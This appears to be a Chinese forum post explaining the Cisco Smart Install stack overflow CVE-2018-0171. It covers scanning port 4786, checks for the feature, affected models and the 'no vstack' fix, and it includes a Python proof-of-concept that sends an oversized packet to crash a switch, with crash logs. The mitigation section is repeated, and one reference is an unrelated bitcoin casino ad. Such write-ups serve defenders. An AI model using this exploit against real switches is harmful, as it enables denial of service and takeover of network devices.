taibeihacker
Moderator
0x01前言
在Smart Install Client代碼中發現了基於堆棧的緩衝區溢出漏洞,該漏洞攻擊者無需身份驗證登錄即可遠程執行任意代碼。 cisco Smart Install是一種“即插即用”的配置和圖像管理功能,可為新的交換機提供簡易的部署。該功能允許用戶將思科交換機放置到到任何位置,將其安裝到網絡中,然後啟動,無需其他配置要求。因此它可以完全控制易受攻擊的網絡設備。 Smart Install是一種即插即用的配置和圖像管理的功能,為新型交換機提供良好的圖形界面管理。它能使初始化配置過程自動化,並通過當前加載操作系統的鏡像提供新的交換機。該功能還可在配置發生變化的時候提供熱插熱拔的實時備份。需要注意的是,該功能在默認情況下客戶端上是啟用了的。0x02漏洞描述
思科IOS 和IOS-XE 系統Smart Install Client 代碼中存在一處緩衝區棧溢出漏洞(CVE-2018-0171)。攻擊者可以遠程向TCP 4786 端口發送一個惡意數據包,利用該漏洞,觸發目標設備的棧溢出漏洞造成設備拒絕服務(DoS)或在造成遠程命令執行,攻擊者可以遠程控制受到漏洞影響的網絡設備。據悉,思科交換器TCP 4786 端口是默認開放的
0x03检查漏洞
1.如果您的思科網絡設備開放了TCP 4786端口,則易受到攻擊,為了找到這樣的設備,只需通過nmap掃描目標網絡。nmap -p T:4786 192.168.1.0/24
2.要檢查網絡設備是否開放了Smart Install Client客戶端功能,以下示例是在顯示配置為Smart Install Clien的Cisco Catalyst交換機上的show vstack config命令輸出:
switch1# show vstack config
Role: Client (SmartInstall enabled)
.
switch2# show vstack config
Capability: Client
Oper Mode: Enabled
Role: Client
來自show vstack config命令輸出的Role:Client和Oper Mode:Enabled或Role:Client(已啟用SmartInstall)信息確認設備上已啟用了該功能。
3.思科機子上執行命令判斷,開放了4786端口即使用了SMI。
switchshow tcp brief all
TCBLocal Address Foreign Address (state)
0344B794*.4786 *.* LISTEN
0350A018*.443 *.* LISTEN
03293634*.443 *.* LISTEN
03292D9C*.80 *.* LISTEN
03292504*.80 *.* LISTEN
Cisco IOS和iex軟件版本檢查:
Router show version
Cisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team
ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
4.如果您不確定您的漏洞是否受到影響,可以使用Cisco的Cisco IOS Software Checker進行檢測:
Cisco Security
smi_check/smi_check.py at master · Cisco-Talos/smi_check
Smart Install Client Scanner. Contribute to Cisco-Talos/smi_check development by creating an account on GitHub.
github.com
Land #8880, added Cisco Smart Install (SMI) scanner · rapid7/metasploit-framework@c67e407
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
github.com
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected
0x04 影响范围
影响设备:Catalyst 4500 Supervisor EnginesCisco Catalyst 3850 Series Switches
Cisco Catalyst 2960 Series Switches
包含部分Smart Install Client的设备也可能受到影响:Catalyst 4500 Supervisor Engines
Catalyst 3850 Series
Catalyst 3750 Series
Catalyst 3650 Series
Catalyst 3560 Series
Catalyst 2960 Series
Catalyst 2975 Series
IE 2000
IE 3000
IE 3010
IE 4000
IE 4010
IE 5000
SM-ES2 SKUs
SM-ES3 SKUs
NME-16ES-1G-P
SM-X-ES3 SKUs
0x05 漏洞验证
以下是此漏洞驗證的PoC:# smi_ibc_init_discovery_BoF.py
import socket
import struct
from optparse import OptionParser
# Parse the target options
parser=OptionParser()
parser.add_option('-t', '--target', dest='target', help='Smart Install Client', default='192.168.1.1') parser.add_option('-p', '--port', dest='port', type='int', help='Port of Client', default=4786) (options, args)=parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__=='__main__':
print '[*] Connecting to Smart Install Client ', options.target, 'port', options.port
con=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))
payload='BBBB' * 44 shellcode='D' * 2048
data='A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1=craft_tlv(0x00000001, data) tlv_2=shellcode
pkt=hdr + tlv_1 + tlv_2
print '[*] Send a malicious packet'
send_packet(con, pkt)
要攻擊交換機,則運行以下命令:
host$ ./smi_ibc_init_discovery_BoF.py-t 192.168.1.1
在交換機上應顯示崩潰信息並重新啟動:
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC=42424240
-Traceback=42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
===Flushing messages (00:10:39 UTC Mon Mar 1 1993)===Buffered messages:
.
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE
(fc3)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0=0x42424240 SRR1=0x00029230 SRR2=0x0152ACE4 SRR3=0x00029230
ESR=0x00000000 DEAR=0x00000000 TSR=0x84000000 DBSR=0x00000000
CPU Register Context:
Vector=0x00001200 PC=0x42424240 MSR=0x00029230 CR=0x33000053
LR=0x42424242 CTR=0x014D5268 XER=0xC000006A
R0=0x42424242 R1=0x02B1B0B0 R2=0x00000000 R3=0x032D12B4
R4=0x000000B6 R5=0x0000001E R6=0xAA3BEC00 R7=0x00000014
R8=0x0000001E R9=0x00000000 R10=0x001BA800 R11=0xFFFFFFFF
R12=0x00000000 R13=0x00110000 R14=0x0131E1A8 R15=0x02B1B1A8
R16=0x02B1B128 R17=0x00000000 R18=0x00000000 R19=0x02B1B128
R20=0x02B1B128 R21=0x00000001 R22=0x02B1B128 R23=0x02B1B1A8
R24=0x00000001 R25=0x00000000 R26=0x42424242 R27=0x42424242
R28=0x42424242 R29=0x42424242 R30=0x42424242 R31=0x42424242
Stack trace:
PC=0x42424240, SP=0x02B1B0B0
Frame 00: SP=0x42424242 PC=0x42424242
0x06 漏洞修复
#conf tEnter configuration commands, one per
line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no
vstack
NSJ-131-6-16-C2960_7(config)#exit
關鍵的就是這句no vstack
再看,端口已經關掉了。
#show tcp brief all
TCB Local
Address Foreign Address
(state)
075A0088 *.443
*.*
LISTEN
0759F6C8 *.443
*.*
LISTEN
0759ED08 *.80
*.*
LISTEN
0759E348 *.80
*.*
LISTEN
0x06 漏洞危害
可能會導致攻擊者在受影響的設備上導致緩衝區溢出,這可能會產生如下影響:觸發設備的重新加載
允許攻擊者在設備上執行任意代碼
在受影響的設備上引發無限循環重啟,是設備崩潰
0x07 漏洞修复
#conf tEnter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
關鍵的就是這句no vstack
再看,端口已經關掉了。
#show tcp brief all
TCB Local Address Foreign Address (state)
075A0088 *.443 *.* LISTEN
0759F6C8 *.443 *.* LISTEN
0759ED08 *.80 *.* LISTEN
0759E348 *.80 *.* LISTEN
0x08 参考文献
Bitcoin Casino Getwin | Топ Биткоин Казино | Fiat Casino 2022 👑🇷🇺
⚡ Биткоин казино Getwin: настоящее bitcoin casino ⚡ Доказуемо справедливый ⚡ анонимные счета ⚡ топ бонусы ⚡ 8400+ биткоин игры. Лидер индустрии crypto casino.
embedi.com
Cisco Security Advisory: Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The...